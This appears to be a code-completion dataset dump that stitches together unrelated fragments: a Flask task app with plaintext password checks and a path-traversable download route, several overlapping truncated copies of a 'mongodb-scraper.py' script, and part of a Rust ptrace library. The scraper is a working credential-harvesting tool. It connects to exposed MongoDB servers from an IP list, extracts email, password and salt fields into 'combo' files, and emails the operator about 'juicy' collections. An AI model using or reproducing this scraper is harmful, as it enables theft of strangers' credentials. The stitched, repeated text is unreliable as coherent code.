@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
for cur_line_number, line in enumerate(open(the_file_path, 'rU')):
if cur_line_number == line_number-1:
return line
return ''
@app.route('/getValue/<row>/<line>', methods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
# 调用添加方法
db.session.add(user)
db.session.commit()
return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify('success')
@app.route('/updateTask', methods=['POST'])
def update_task():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
task_id = json_data.get("id")
user_id = json_data.get("user_id")
status = json_data.get("status")
folder_name = json_data.get("folder_name")
if int(status) == 2:
files_list = os.listdir(address + str(folder_name))
create_excel(len(files_list), address + str(folder_name))
task = Task.query.filter_by(id=task_id).first()
task.user_id = user_id
task.status = status
db.session.commit()
# user_id = request.headers.get('Authorization',None)
users = User.query.all()
return jsonify(users)
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key= | True | identifier_name |
|
mongodb-scraper.py | ed = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
# Create a rotation logging, so we won't have and endless file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists
if not os.path.exists('data'):
os.makedirs('data')
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
|
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return
def _check_datafile(self):
size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def scrape(self):
for ip in self.ips:
# Do I have already processed this IP?
if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
# Is this a collection I'm interested into?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
# If we find anything that resemble an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info("\ | try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return | identifier_body |
mongodb-scraper.py | = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
# Create a rotation logging, so we won't have and endless file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists
if not os.path.exists('data'):
os.makedirs('data')
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return
def _check_datafile(self):
size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def | (self):
for ip in self.ips:
# Do I have already processed this IP?
if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
# Is this a collection I'm interested into?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
# If we find anything that resemble an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info | scrape | identifier_name |
mongodb-scraper.py | ed = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
# Create a rotation logging, so we won't have and endless file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists |
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return
def _check_datafile(self):
size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def scrape(self):
for ip in self.ips:
# Do I have already processed this IP?
if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
# Is this a collection I'm interested into?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
# If we find anything that resemble an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info("\ | if not os.path.exists('data'):
os.makedirs('data') | random_line_split |
mongodb-scraper.py | ed = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
# Create a rotation logging, so we won't have and endless file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists
if not os.path.exists('data'):
os.makedirs('data')
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return
def _check_datafile(self):
size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def scrape(self):
for ip in self.ips:
# Do I have already processed this IP?
|
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
# Is this a collection I'm interested into?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
# If we find anything that resemble an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info("\ | if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue | conditional_block |
lib.rs | }
}
pub type Pid = usize;
#[derive(Clone, Copy, Debug)]
pub struct IntRegisters(pub syscall::IntRegisters);
impl IntRegisters {
pub fn format_syscall_bare(&self) -> String {
arch::format_syscall(None, &self)
}
pub fn format_syscall_full(&self, mem: &mut Memory) -> String {
arch::format_syscall(Some(mem), &self)
}
pub fn return_value(&self) -> usize {
arch::return_value(&self)
}
}
impl Deref for IntRegisters {
type Target = syscall::IntRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for IntRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Copy, Debug)]
pub struct FloatRegisters(pub syscall::FloatRegisters);
impl Deref for FloatRegisters {
type Target = syscall::FloatRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for FloatRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub enum EventData {
EventClone(usize),
StopSignal(usize, usize),
StopExit(usize),
Unknown(usize, usize, usize, usize, usize, usize),
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub struct Event {
pub cause: Flags,
pub data: EventData,
}
impl Event {
pub fn new(inner: syscall::PtraceEvent) -> Self {
Self {
cause: Flags::from_bits_truncate(inner.cause.bits()),
data: match inner.cause {
syscall::PTRACE_EVENT_CLONE => EventData::EventClone(inner.a),
syscall::PTRACE_STOP_SIGNAL => EventData::StopSignal(inner.a, inner.b),
syscall::PTRACE_STOP_EXIT => EventData::StopExit(inner.a),
_ => EventData::Unknown(inner.a, inner.b, inner.c, inner.d, inner.e, inner.f),
},
}
}
}
pub struct Registers {
pub float: File,
pub int: File,
}
impl Registers {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
float: File::open(format!("proc:{}/regs/float", pid))?,
int: File::open(format!("proc:{}/regs/int", pid))?,
})
}
pub fn get_float(&mut self) -> Result<FloatRegisters> {
let mut regs = syscall::FloatRegisters::default();
trace!(self.float.read(&mut regs)?, ®s);
Ok(FloatRegisters(regs))
}
pub fn set_float(&mut self, regs: &FloatRegisters) -> Result<()> {
trace!(self.float.write(®s)?, ®s);
Ok(())
}
pub fn get_int(&mut self) -> Result<IntRegisters> {
let mut regs = syscall::IntRegisters::default();
trace!(self.int.read(&mut regs)?, ®s);
Ok(IntRegisters(regs))
}
pub fn set_int(&mut self, regs: &IntRegisters) -> Result<()> {
trace!(self.int.write(®s)?, ®s);
Ok(())
}
}
impl fmt::Debug for Registers {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Registers(...)")
}
}
pub struct Memory {
pub file: File,
}
impl Memory {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: File::open(format!("proc:{}/mem", pid))?,
})
}
pub fn read(&mut self, address: *const u8, memory: &mut [u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.read_exact(memory)?;
trace!(memory);
Ok(())
}
pub fn write(&mut self, address: *const u8, memory: &[u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.write_all(memory)?;
trace!(memory);
Ok(())
}
